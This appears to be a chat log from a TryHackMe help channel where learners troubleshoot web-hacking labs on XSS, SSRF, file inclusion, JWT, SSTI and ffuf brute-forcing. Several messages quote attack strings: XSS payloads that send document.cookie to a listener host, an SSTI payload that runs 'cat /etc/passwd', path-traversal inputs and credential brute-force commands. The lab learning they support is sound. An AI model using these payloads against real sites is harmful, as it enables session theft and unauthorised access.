Hello everyone. I'm new to tryhackme and I'm trying to do the wireshark 101 room. For the section on https they say during handshake that 4 packets are being sent : Client Hello, Server Hello, Client key exchange and the confirmation of the client key exchange. But when using wireshark to view the traffic when I connect to www.google. com I only see the first two packets : Client Hello and Server Hello. Right after data is being exchanged encrypted. Can someone explain why I don't see the client key part ?

Which task is this?

Heyy guys

Help required in the SSRF Room..!

I cant figure out the challenge on how to get the list of open ports.

I'm in the XSS room and I'm waiting for jack's cookie...

I think he's dead

The payload for works for me so he has to work for him right?

oh I didn't read the hint I'm dumb

Room: ZTH - Obscure Web Vulns | Task 14
As far as I understood, all we need to do is change the header value of "alg" to HS256 and sign the new token with the public key found, right?
I did that with jwt_tool.py and checked the token with jwt.io. Looks legit, but I still get an error "Try again". (Didn't take longer than 2 min, so the token was still valid)

EDIT: Solved. Accidentally tried to sign the JWT with the public key, instead of trying to use it for exploitation.

I'm trying to get the flag in the api bypassing challenge of zthweb2, I tried multiple times bruteforcing the parameter that should execute the command in the /api.php endpoint, but I can't find anything. The hint says to use big.txt (which I assume it refers to /usr/share/wordlists/dirb/big.txt) but nothing!

is api.php even the right endpoint???

😩

had to look a writeup, wtf was that

Having a bit of an issue with the Burp Suite basics module, would anyone well versed be able to assist? I'm sure it's just something obvious that's stopping me.

When trying to use the built-in burp suite browser to browse to the machine I have running it is unable to connect?

No error, just hangs.

Able to access other sites though.

still having issues with this?

Hi all, would anyone be interested in joining a group where we go through labs and hack together in real time? We can ask each other questions, learn from each other and keep ourselves honest and motivated. I'm going to start working my way through portswigger labs soon. Please DM me if you want to connect. Preferably if you're near the same time zone as me (UTC+0) and speak fluent English.

doing LFI rn

what is the reason behind this, i have given chmod 400

id_rsa file

iirc it should be chmod 600

It doesn't overly matter as long as other users can't access it

idk but i made new dir imported the private key there and this time it worked

whats the logic behind this?

also @elfin fog whats iirc?

if i remember correctly 👍

Got it 👍

Probably permissions on that directory

!docs verify

Hi all, I'm having some trouble doing the Introduction to OWASP ZAP room, I think doesn't really explain properly the subject. I don't understand how to add manually the cookie of the authenticated session

What task?

Hello

I'm having trouble in django part, unable to install pip3 django, it's showing error 101

Hello guys! I literally feel helpless on Vulnerabilities/LFI room. I found the parameter that we are looking for and I am supposed to enter ../../etc/passwd after the equal sign.
I tried almost everything (list of possibilities) and still nothing happens. Could you help me pls what could be the issue?

won't work with AttackBox nor with Kali

i actually got stuck there earlier tonight. you are overlooking something

or at least, that's why i was stuck

thanks for answering. i guess i am overlooking something but it is annoying that I spent hours on what it could be

yeah i don't think it should take hours. feel free to dm me this was only an invitation for biroszi94 to dm me. if anyone else is stuck on this room, please ask in this channel instead

Which task and which question ?

Hello everyone. I'm trying to complete Authentication Bypass Task 3. "Brute Force" with ffuf. However I am getting no results for the username/password combination and I don't know where I am going wrong

For some reason my "valid_usernames.txt" reads like this from task 2

[2Kadmin [Status: 200, Size: 3720, Words: 992, Lines: 77]

[2Krobert [Status: 200, Size: 3720, Words: 992, Lines: 77]

[2Ksimon [Status: 200, Size: 3720, Words: 992, Lines: 77]

[2Ksteve [Status: 200, Size: 3720, Words: 992, Lines: 77]

I think this is maybe why the task 3 is not working?

I even fixed the file to just be

admin
robert
simon
steve

But when running the command in task3 to enumerate the usernames and password I get zero results.

THIS IS DRIVING ME INSANE!!!!!!!!!!!!

This seems to be an extremely common problem for over 6 months now: https://tryhackme.com/forum/thread/611bf426d8622a0050b8ad6a#last

So with all these extra strings like status, size etc. it's not working obviously as there are no username called admin[Status:200] etc.

Also, if you just edited the original file ffuf has generated, it might not work either due to formatting of that file

I had to manually create a new valid_usernames.txt file using nano in order for this to work

So I suggest you create a new file with touch filename and manually write the usernames in it

I think the room should be updated though if possible - it seems I'm not the only one getting this issue for such a long time

I'll try to reproduce it and raise it with them, as this happens due to the ffuf output file line endings as far as I know

Mh, actually it seems there is nothing to raise, as the command doesn't tell you to use ffuf to create the valid usernames file

Is it possible to use proxychains with burp?

Before asking here, please ensure you do some research - a simple google search answered your question

any help regarding this ...

Are you struggling to understand what recursion is?

That's a recursion error

I can explain if it might help.

@quick palm I know about recursion but i'm not able to determine how to resolve this

Hello THM'ers

I cannot get this cookie for this task https://tryhackme.com/forum/thread/615ac49ea3fa010048ff32b4

I've restarted the attack box, I've restarted the machine, I've tried everything and it does not trigger any request at the listener

My listener is 863a3192b9636f860d786dced8504f4c.log.tryhackme.tech

The payload for the ticket I'm using is </textarea><script>fetch('http://863a3192b9636f860d786dced8504f4c.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

Anyone able to help me with the above?

I've tried it with http and https and both ways do not work. Nothing comes through on the listener 😦

Often preflighting as well

I have looked at console and the network tab and I see no problems here. Indeed when I use https version of the acme site and send to a http version of the listener, I can see an error on my GET request if I try and open the ticket. But if I'm using the http version and send to the http listener, I get no issues but still receive no events on the listener. I'm certain the automation must be broken. I've tried this like 8 times now, I'm going mad.

Add to your hosts file?

tryhackme.tech should be because it was used for the in browser machine access

Not sure about the requests catcher but seems to work around doesn't it?

Request catcher has broken a few times, is this a@sand widget thing? I think that's Adam's project? ¯\_(ツ)_/¯

I'm not entirely sure to be honest. Yeah it's adams project. We have some documentation on it, and I'll take a look, but Skidy worked with Adam on it to some extent so he would be best port of call otherwise

Are you good to raise this in slack or whatever?

Yeyee (:

@orchid hazel

Hi all, ive started to work through this room and all is going well so far, however im struggling to understand how to set a cookie with curl (im doing the task 5 mini ctf)

any help would be appreciated

i think whats troubling me is the format of how to write the data of the cookie

curl --cookie "nameofcookie=valueofcookie"

is that easy to understand???

yeah thank you for that, also 1 more question if u dont mind, as im still quite new to linux im wondering how the commands should be structured, cause i never know where to write the data with the flags ie --cookie. Does it depend on the command or does it not really matter?

for example if i did:
curl {ip:port} --cookie "flagpls=flagpls"
is that the same as:
curl --cookie "flagpls=flagpls" {ip:port}

cause i get same result but i wonder if it applies to every command

well in some commands the options need to be ordered in certain ways but it depends on the command.... generally you want the data for the command to use to be after all the optional flags

for example from the options you gave above shadow would prefer to use the second option

or for nmap sudo nmap -sS -vv -T4 -p- -oA fullportscan $ip

ah okay i see, thank you very much for that

bit of a conceptual question, I'm doing the SSRF room, it explains everything and has a little website where to test the vuln. However my question is, the website is designed apposite to have that vulns and to have only one place for interaction, which is to return true or false if that port is reachable. How would that look like in a real website? like how to test a real website if is vulnerable or not? other rooms explain the cause and how to test it, in this room there is literally just one box that tells you this port is closed and this is not, but not much projection past the workshop machine

of course, would never try on real website, it was mostly to understand how this would work in real life environment and what vector to use. Thank you for the explanation!

Gave +1 Rep to @halcyon mortar

Hey THM'ers,

I'm in the zth vulns room () Task 4

I'm 99% sure that my answer should be right but it's not accepting it and I have no idea why? It even matches the expected answer format.
{{******.*********.********.*****************.********** /***/********.******}}
{{config.__class__.__init__.__globals__[‘os’].popen(‘cat /etc/passwd’).read()}}

Did you copy that answer from somewhere?

from payloadallthethings

The quote marks are fancy quotes, not real quote marks

omg 🤦‍♂️

Thanks! I could not see that! Rendered the same for me in my browser so I did not bother to alter it. Driving me nuts

Hello guys, I need some help in room "Intro to django" task 3 , i followed all the steps until now but i got some errors while migrating form app. Can someone tell where im doing wrong here some ss

You gotta make urls folders @timber bramble so skip the step and follow the tutorial after that

It will work whatever step you’re stuck on skip migrating and continue you will get to “hello world” @timber bramble

@neat plume so i have to migrate app later on not now ?

so i have to skip the step

My gf did not migrate and got it to work

ok i will try this one then @neat plume thanks for advice

Gave +1 Rep to @neat plume

@neat plume one question the hello world func i have to create inside the url.py file ?

I think views calls it to the website

ok i got thanks bud

no problem

i have a question about the authentication room

there's a technique/task called "re-registration"

where u register an already present username but leave a space before the first letter

and the app displays content as if ur the original user

can somebody explain to me why this works ?

The app is stripping the space, but not in the correct place

so it strips it on sign up after checking if it exists am i right?

is that prevalent in real world apps?
is it worth putting in my methodology or this is an edge case ?

Hi, im up to the installation of zap, and im trying to install the package "libjenkins-htmlunit-core-js-java" so that i can use ajax spider. However when i try to run the command "sudo apt install libjenkins-htmlunit-core-js-java" i get an error saying its unable to locate the package, does anyone know what to do abt this?

im not able to find a solution online ^

@hazy rivet What room and task is this for?

Its the introduction to OWAZP ZAP - Task 4

What distro are you using?

Kali linux

also how can i use my personal machine to complete the tasks? id like to get more familiar with it rather than using the attackbox if ygm

!vpn

^ You can connect from your Kali VM to the VPN and use it like that.
Just make sure to connect directly from the VM, not from the host

thank you for that!

Gave +1 Rep to @orchid hazel

regarding this problem tho, all that im provided w is this

i cant send ss in here actually :/

!docs verify

If you verify with the bot, you'll be able to

E: Unable to locate package libjenkins-htmlunit-core-js-java

ah okay 1 sec

also is it recommended to create a new user than using kali? im still relatively new to linux so idk all of the security precautions

Just make sure the password isn't still set to kali

ah shit yeah it was lol, thank you haha

Gave +1 Rep to @orchid hazel

i remember a while ago when i tried installing kali, you had to create the user n stuff but now i presume it all comes pre packaged as it was pretty much 'plug and play' when i installed it

Both exist

so i can use this user for everything then and wont fuck up my root user or anything?

You downloaded the pre-built VM, you can still get the ISO and install it yourself

It's a sudoer, you can break stuff just the same

hmm is that bad then?

or is that how most people use their machine

ah okay so any time i use 'sudo' does it give root privileges i assume?

so equivalent to using admin privileges on windows?

Kinda yeah

I'd recommend running through the Linux rooms on tryhackme, I forget the current names

ive worked through the linux fundamentals which was alright but ofc it doesnt go too much in depth so i understand how things are done but not exactly how they work if ygm

I'm a newb working the the Zth: Obscure web vulns. On task 14 for the JWT challenge, I keep getting a syntax error when using python to re-encode the token. It says invalid characters. Any ideas?

first could you provide a screenshot so we can see what the error is and also what your input is??? if you can't post screenshots please follow the link in the bot message bellow.....

!docs verify

Hi

Thanks for the help. I saw the first error was a typo, but the 2nd (and the one that is recurring) is the bigger deal. Is it in the public key to hex that I'm messed up?

Gave +1 Rep to @sweet python

hmmmmm wonder whats wrong there

hopefully someone else knows

tip: use 2to3 python2file.py to covert it into python3 format :)

I finally got it! Thank you.

Gave +1 Rep to @halcyon mortar

Thank you. I'm confident in java, but less so w/ python and miss little things like that. I appreciate it!

Thanks for getting ball rolling for help. I've got it.

how do you get that to be available to run in terminal on ubuntu 20.04????

apt install 2to3

huh thought it would be some sort of pip package.... guess not

Hi guys

Hi Lesley

Hi

hello everyone, I need help in ZTH:web2 room in forced browsing challenge , when im trying to run wfuzz im not getting the result. Idk what im doing wrong here plz check this ss

and when trying to run wfuzz as superuser im getting this error

im trying to fuzz that url

but it says to many arguments

oh i got it thanks @halcyon mortar

Gave +1 Rep to @halcyon mortar

Hello
I am in XSS room and in XSS playground flag is not showing for filter-evasion
I tried this payload : <img src="root" onmouseover=alert(unescape("\u0048\u0065\u006C\u006C\u006F"))>
in 3rd question where word hello is filtered and I get alert window but flag is still not showing

This payload : <img src="baj" onerror=alert("HHelloello")>
from a writeup worked

Why was my payload not working?
Limited checking in backend?

@thin ridge sorry if im too late try onclick or onmouseover instead of onerror

should work.

as I believe task three only checks for specific regex pattern which is exactly "Hello" so from the writeup they just escaped the pattern by including a H before the word Hello followed by ello which will be escaped once checked and a valid hello input will be inserted into the payload.

I honestly did an insane amount of escaping too which actually worked and alerted Hello but no flag appeared afterwards for both challenge 2 and 3. I'm not sure why too, so I just looked up the writeups for both of them which implemented a much much simpler payload :)))))))))

What's interesting, I actually got the flags for both challenge 3 and 4 by using this payload: ||<div onclick="alert('Hello');">click</div>|| . The "Hello" got replaced by "" and the alert displayed as blank, but it somehow still gave me the flags afterwards. Not sure if this was intentional.

Hello

How to get flag for the mini ctf

I keep getting error

Anyone know how to fix curl(7) failed to connect to 10.10.x.x port 8081: connection refused ?

I used the IP address in the attack box

That's the wrong IP. You need to deploy the target machine and use it's IP.

Gave +1 Rep to @orchid hazel

@little ice Please don't use that word here, it's not appropriate.

tried every possible attack at this end point .. but did't got anything ..if anyone have solved this please let me know.. thanku

could you show your positions and payload in burpsuite?

@austere pike
http://ip_machine/support/ticket/$1$

that didn't really answer the whole question, and just to make sure do you have the target machine running and you have replaced the ip_machine with an actual machine ip?

In the upper right corner I see a red foxyproxy icon, did you switch your proxy to burp?

Yes .. I closed it when i got nothing..

It's hard to help if you are not doing the task currently or providing all the information what you were doing. Screenshot of the positions tab and another from the payload tab could have been useful, because I can't just feed you the answer not knowing what you have actually tried

You still need help with it?

@rare relic no i got it 🙂

Pickle rick CTF done, no walkthroughs 😅

That was painful

I’m having an issue with burpsuite in the file uploads clubs v2.1 bypassing client-side filtering. I have added the host to etc/hosts but burp is not getting a response

Note to self
"Check Firefox hasn't automatically added 'https://' when entering the machines IP address 🤦‍♂️

Just spent 15mins trying to troubleshoot why I couldn't access the machine

Yes, there a config setting you can change to always show the full URL > https://techglimpse.com/about-config-firefox-tips-show-full-url/

That is super helpful

Im stuck on SSTI Challange in section 1 becouse of internal server error, this is my issue or thm server? Like i tried everything to do/solve task but site still redirects me to "Internal Server Error"

ssti??? that does not sound like it is part of this path... what room and task exactly??? preferably a link to the room

Server Side Template Injection.

yeah did not find a room for that in this path

They maybe in the wrong channel.

¯_(ツ)_/¯

wanted to help but as shadow has not done anything with server side template injection that would be hard

I watched video on youtube where guy complete this room but he didnt had this issue
Edit: Everything works fine rn, it was (prolly) thm server issue

Finding this path so much harder than the others. JWT has frustrated me for an hour and I've had to walk away for the first time.
Think I need to learn some JS before coming back

2 months and I've hit my first wall 😭

Which room?

is it the django room???

No the ZTH obscure web vulns

It's the first time I've been through a walkthrough and though "I still don't really get what I'm doing practically"

Like I understand JWT have 3 segments that are base64 encoded. Header, payload and signature.

IIRC they're encoded separately and concatenated with a . between them

That might help?

The JWT on that room is frustrating for many though

I get I'm supposed to changed the alg to HS256 but I don't understand how that allows me to exploit things if the signature is still intact

I think I just need to go away and learn about how it works in general

https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens this has some nice overviews on how some of the attacks work

That is very helpful. I'll come back to it with a fresh mind later, it absolutely ruined me today.

It looks like I'm confusing 2 CVEs

Either the signature isn't checked in which case changed the header still creates a valid token and you can add whatever payload you need.

Or

It checks the signature but it will use the public key (hs256) rather than the private key (rs256) so you can generate a correct signature by using the public key.

د

Hi guys, I’m currently doing the unit 5 Django CTF, gotten to the part getting into the messagebox/settings.py and trying to add my ip to allowed hosts but can’t figure out how to format it and when I save anything it says , error writing, no such file or dir

It’s within Nano, not sure if it’s down this way or some way else to add my IP to allowed hosts?

ah that room is a pain

did you try following a writeup for that ctf???

Yeah I did, one write up said just to add my ip to it but didn’t format it how and I’m making mistakes lol, you have a more reliable write up?

||https://github.com/Thiousi/TryHackMe/blob/master/django.md||

should show you the format of how to put the ip

also you might need to cd into the directory with the settings.py file and then open nano for that file

hope that link helps @rare relic

Intro to Django it says to run python3 manage.py migrate and I am getting that the directory doesn't exist

i dont know if im reading something wrong but could use help on task 3 answer 1 on introductory networking

Check the picture and text below it for explanation

ah i was thinking of stage 2 as layer 2 i lil tired lol

ty

where does the project root begin? where is the root of the first app? Have you checked the official django docs?

Hi guys!! I'm new here 🙂
Little question. Is it me or the web-fundamentals path changed a bit ?

It's slightly changed.

Thanks you @restive hemlock. I thought i was going crazy because i couldn't find the Django intro anymore xD

Gave +1 Rep to @restive hemlock

Yeah, it's still on the site but it's not in the module anymore.

Thank you very much @lavish moth

Gave +1 Rep to @lavish moth

oh the djnago room got moved out of this path??? great as that room was a pain in the bum and not really that helpful for web fundamentals part of web hacking

I just started it, but I was having issues with it also, haha.

Oh, I now have 100% on this path, because the rooms I hadn't done are now removed from the path 😄

Oh sweet 😅 I can forget about JWT for a while now

What should I do now I've finished web fundamentals ? Biggest gap on my skills chart is priv ESC ...

JrPenTester has a lot of good material, and ends with linux & windows priv esc

That is a very good shout. I only have jnr and offensive left 😭😅

Hi. I have started the Web Fundamentals path a few months ago and then i took a liitle rest.... my progress was maybe about 80-90%. But today, i logged in again and now I have passed this exam... automatically. The part of "Practice makes Perfect" is missing now. Could someone please tell me where I can find these modules? Cause I really wann finish this shit 😉 😎

I think a few rooms were removed from the path, the Intro to django and the java script one IIRC

The're still available just not in the path

ah, now I remember, the intro to django i did. thanks for yourt hints! i will search for these modules. more hints for the missing modules welcome 🙌

Gave +1 Rep to @queen mural

Help needed! If a website allows user to enter any url for their custom purposes, what steps should the website take to make sure that the URLs are safe other than checking whether it starts with https or not. Note that whitelisting is not possible since users can add any URLs. Thanks in advance.

Is this related to a room in the tryhackme web fundamentals path?

hello to everyone, i'm from france, after the pre security pathway i started the web fundamentals path and i'm lost in the file inclusion lesson, should i have started another path ?

nah this one should have been fine to start after pre security... though the recommended one is junior pentester after pre security

can you specify more on what you are stuck on???

thanks for your answer

Gave +1 Rep to @sweet python

no problem

like to help others

on the file inclusion lesson, they say you can use burpsuite but i never used it

ah

if you go to the path you will see there is one whole section on burp suite

you can do that now if you want and it will help you understand how to use it

it will not break the flow

yes

probably quicker to go through those rooms then it would be for shadow to try and explain how to use it for this

yes i'm going to learn burpsuite first and then come back to file inclusion and ssrf

good luck and most importantly have fun learning

yes it's awesome

Hey in tryhackme, it says there must be a flash.min.js file in debugger

but there isn't

whats the problem ?

What you mean? You even put a red frame around the file called flash.min.js ?

okey i solved that

thanks anyway

Gave +1 Rep to @misty shadow

Wait after completing pre security is it better to do complete beginner or junior pentester?

junior pentester as complete beginner is discontinued/depreciated

What’s that supposed to mean

Which one is a better choice

junior pentester is the better choice

as complete beginner is super old and not updated

What’s wrong with complete beginner?

Ah ok

Thanks for letting me know

no problem

Hey im in the authentication bypass room and in the bruteforce task i use the exact same command but i didnt get any results

any idea of what i can be doing wrong?

This is what i imput in the terminal -->>>(ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.6.213/customers/login -fc 200)

shadow

zeeshan

I am on upload vulns room task 11. I am trying to remove the client side filter by removing upload.js but burp is not intercepting the .js request.

• I have Intercept js set in Burp.
• I am also pressing Ctrl+F5 so that I do not got 304.

I'm a noob and am stuck in the 'Authentication Bypass' room of the 'Introduction to Web Hacking' module of the 'Web Fundamentals' path. The specific task I am stuck on is called 'Brute Force'.

In the previous task, I ran this command (replacing ip_address with the IP address of the machine):
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://ip_address/customers/signup -mr "username already exists" > valid_usernames_temp.txt

And successfully wrote the 4 valid usernames to a new file. I then took just the first word of each line and put it in a new file using awk '{print $1}' valid_usernames_temp.txt >> valid_usernames.txt For the 'Brute Force' task, I'm running this command (replacing ip_address with the IP address of the machine):
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://ip_address/customers/login -fc 200

I don't get any errors, but I also don't get any output. I've tried writing any potential output of the command to a new file, but the file is empty, so I know nothing is being outputted. I did some research and found the answers to this task (the username and password). I've verified that the correct answer for username is in my valid_usernames.txt file and the correct answer for password is in my 10-million-password-list-top-100.txt file. I've also navigated to the site and tried logging in with those credentials and it worked.

So to summarize, I know the correct username and password for the site, I know the correct username is in my username wordlist, and I know the correct password is in my password wordlist, but for some reason this ffuf command still doesn't output anything. Any thoughts on what might be wrong?

I took the advice of a post up above and manually made the valid_username.txt file using nano and that worked. I'm not sure why the other file wasn't working though.

Have you checked the contents of the other file?

There seems to be an issue in the XSS room. In the final task, after deploying the payload, I got back the session cookie as asked, but it's not the same as that in the answer. Any ideas?

are you sure that is a staff cookie and not your own cookie???

yikes, not sure

how will i be sure?

the payload seems to be correct

checked with the listener and the http server deployed locally, same values for both

well if you visited the page after uploading the xss payload you will get a copy of your own cookie

to get the staff cookie might take some time

so keep a listener on it

okayyy

makes sense :)

good luck

thanks!

no problem

When I cat the file, it looks just like what I would expect. It's a list of 4 usernames, each on a separate line. However, when I open it with Pluma or SublimeText, I get something a little odd. First, each user name is preceded by a blank line, so the first username is on line 2 of the file, the next is on line 4, etc. The other odd thing is that each username is preceded by a weird symbol, and the following string '[2'. The symbol looks like a box with a zero in the top left and top right corners, a 1 in the bottom left corner and an uppercase B in the bottom right corner. In Sublime text, rather than a strange box symbol I get the following: <0x1b>. In VIM I instead see ^M^[[2 before each username and ^M after each username. After some digging, I think the ^M are the newline characters.

Using Pluma, I deleted the extra symbol and characters. I thought that might be causing the issue, but when I delete the extra lines and symbols, save the file, and then rerun the command in the terminal, I still get no results.

There can be characters that don't render that cause issues

How can I see/remove those characters and why might they have been written in the first place?

Hex editor, and idk. There's already some weird escape sequences from the first time around.

Had same issue. It seems like output of command is using some encoding. Which I find strange because it wont accept it as param for wordlist. If you edit with nano, and delete all unwanted chars, it will ask you for format (MAC/DOS) if you save it in DOS cat will work fine aswell as ffuf command. Mac format will break cat - not output anything, while nano or vim will show everything fine. Ffuf wont work in this case.

Cool. Thank you!

Gave +1 Rep to @subtle haven

Still I can't consider this as solution, because list may contain X amonut of lines in that case manual edit is not thing to do. Maybe ffuf command has some way to specify output format to be suitable for wordlist out of box.

I have a question about the 2nd Challenge Question in the File Inclusion section of the web fundamentals path. I got stuck about halfway through this one and found a video of someone that solved it. I was able to get it to work, but I am still really confused as to why it works.

I want to post more here, but also don't want to spoil anything for anyone. What is the best way to do this?

Oh neat! Well, here's my question then.

||I was able to change the cookie value from guest to admin just fine and that makes sense to me. I got stuck after that, but I found a video where a guy put the file path we were trying to access as the cookie value. I don't understand why this works. I thought with File Inclusion the parameter being read by the server to lookup a file was called 'file'. I understand we can pass a cookie value, but isn't that just for site authentication? Why is the PHP include function reading the cookie value and how are cookies connected to file inclusion?||

Cookies aren't just used for authentication, they can be used for lots and lots of things

what's the output of file <file> for working / non-working?

It's ANSI escape codes, maybe colors? Quick ways to check here if you're curious https://vi.stackexchange.com/questions/485/can-vim-interpret-terminal-color-escape-codes

Ok, that was going to be my follow up question. So there are real-world situations where ||a cookie could be exploited for LFI||. Good to know. Thank you!

Gave +1 Rep to @orchid hazel

I can reproduce the behavior that (for whatever reason) when you direct stdout of ffuf to a file, it comes with Mac style line ending (\r) and some escape codes
sed/vim workarounds after the fact + solution using file output options in ffuf: https://www.youtube.com/watch?v=fC9Fd9MTNy4

(Workaround:
vim: :%s/\e\[[0-9][A-Z]//g + :%s/\r//g
sed: sed -i 's/\x1b\[[0-9][A-Z]//g file.txt + sed -i 's/\r//g' file.txt

(one) Solution:
ffuf -w in-file.txt -X POST [...] -u http://target.example.com/login -o valid_usernames_temp.txt -of csv
awk -F, '{print $1}' valid_usernames_temp.txt > valid_usernames.txt

This is awesome! Thank you!!

Gave +1 Rep to @opal meteor

hey so I'm in the SSRF room and i've done everything and gotten to the private directory through the avatar vulnerability. But I'm having issues with decoding the string. When I decode it in base64decode.org it just comes out as garbage, and I tried putting it in a terminal and it's taken over 15 minutes to paste for some weird reason. How do I decode the string? I'm literally just copying and pasting into the website.

nm I found the answer in the forums

I was wondering if anyone could help with OpenVpn. I am trying to connect to an active machine's IP address to view the page. Everytime I go to load the page, it keeps going in circles.

can you open a terminal and type curl 10.10.10.10/whoami

Thank you, I figured it out. I had 2 vpns running. 1 on host and other on virtual. I turned off the host vpn and it worked

Working on file inclusion, task 4 lab 1 https://tryhackme.com/room/fileinc
I was able to view the contents of /etc/passwd but it keeps saying my answer is wrong

Check the hint to see what format the answer should have

Thank you, got it now

Really enjoyed the XSS room in the Web Fundamentals path!! so eye-opening and easy to follow. Thank You!

I have a completed room that appears to not be completed

'and all the tasks in the room (completed) are x8

I now realize that maybe I should write this in "room-bugs", sorry

I have the same issue

I have the same issue too

Hello i have a question related to the xss room in the path.

the netcat listener doenst respond to my payload.
i tried several ip addresses, 127.0.0.1, my tun0 adress and the adress from thm lab 10.10.8.92

in the payload i did it with:

</textarea><script>fetch('http://{127.0.0.1:9001}?cookie=' + btoa(document.cookie) );</script>

and changed it to the other adresses i mentioned in the text above

i red in some reddit threads that there were the same issue.

I had the same issue
Solved it by using attack box

The reason is still unknown

ok, with the attack box it will work?

ok, nice but it would also be nice if it is mentioned in the room. i invested a lot of time and didnt understand why it wasnt working.

ok i will do it

ok i dont get it. it also isnt working.

</textarea><script>fetch('http://127.0.0.1:9001?cookie=' + btoa(document.cookie) );</script>

this was my payload

So when the victim loads that, where's it going to send the cookie?

localhost?

Localhost to whom?

ok, i should use the ip of the attack box

Yep

ok, this makes sense to me, but i dont get a reply on netcat

are you using the thm attackbox cuz that room only works with that

yes

ok, i tried it sometimes, i got a get request with the cookie 👍

Could someone help me out with challenge #1 in the file inclusion room?

So I'm trying to solve it using Burp Suite. I've changed the method to POST. I've tried adding the file as a parameter in the request header, like "file=../../../../etc/flag1", i've also tried "file=/etc/flag1". Whenever I send the request I just get no response

I've tried doing adding it in as a query like "POST /challenges/chall1.php?file=/etc/flag1 HTTP/1.1" and I only get the same page back, as if I didn't add "file=/etc/flag1"

I'm slowly loosing my mind here. I even checked a writeup, and did exactly like they did, and still no dice

Hey can someone help me with this one ... I cant find the Inspector option.. Im using In browser - Kali

Moreover, When I send the request to render it does not show either.

update burp suite

thanks

Hi i don't understand why my try not work for the task 8.1
i use this request :
POST /challenges/chall1.php HTTP/1.1
Host: 10.10.147.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: name=THM; role=admin
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 26

file=../../../../etc/flag1

Is this the file inclusion room?
But either way, I guess it's because of not having a content-type header

Ty !

Gave +1 Rep to @misty shadow

im doing web fundamentals right now, specifically burpsuite, holy cow the dark mode is a HUGE game changer. the UI was killing my eyes

In the file inclusion room, the web server isn't sending a GET request to my server. I have tried on my machine as well as the Attack Box.

I have been unable to connect to reverse shells in other rooms. Come to think of it, it might be because I have Ufw enabled on its default settings

oh yeah that will definitely do it

as that would block incomming connections but not outgoing ones

Thanks for the confirmation. I can stop putting holes in the wall with my head now.

Gave +1 Rep to @sweet python

which means maybe you could have used bind shells to do the hacking but eeeh

bind shells deserve love too...

true

but they are not as popular as reverse shells

in Upload Vulnerabilities room task 4 i cannot upload jpg
I have got "500 Internal Server Error" Tried on my kali and also on attack box

Am stuck at lfi#2 room not sure how to check the code that has include function for the URL

Yes am seeing include.function but still couldn't understand what does it mean

Its not a error. Need an solution on to find the flag

Hoo.. Yes it says to try any path.. Let me get the ss

Anyone has similar problem?